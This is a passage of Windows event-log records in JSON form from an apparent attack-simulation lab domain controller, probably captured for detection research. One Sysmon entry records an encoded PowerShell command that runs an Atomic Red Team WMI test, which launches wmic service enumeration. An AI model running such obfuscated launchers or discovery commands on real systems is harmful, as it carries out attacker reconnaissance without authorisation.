GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220606,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76864,"ProcessID":856,"ThreadID":920,"Channel":"System","Message":"The Windows Modules Installer service entered the running state.","param1":"Windows Modules Installer","param2":"running","EventReceivedTime":"2020-08-01 07:59:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5381,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nProcessGuid: {41C8662E-20D6-5F25-0000-0010A5BA0800}\r\nProcessId: 4572\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" service where (caption like \"%%Spooler%%\")\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","ProcessGuid":"{41C8662E-20D6-5F25-0000-0010A5BA0800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" service where (caption like \"%%Spooler%%\")\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5382,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010A5BA0800}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010A5BA0800}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5383,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010A5BA0800}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010A5BA0800}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5384,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5385,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\W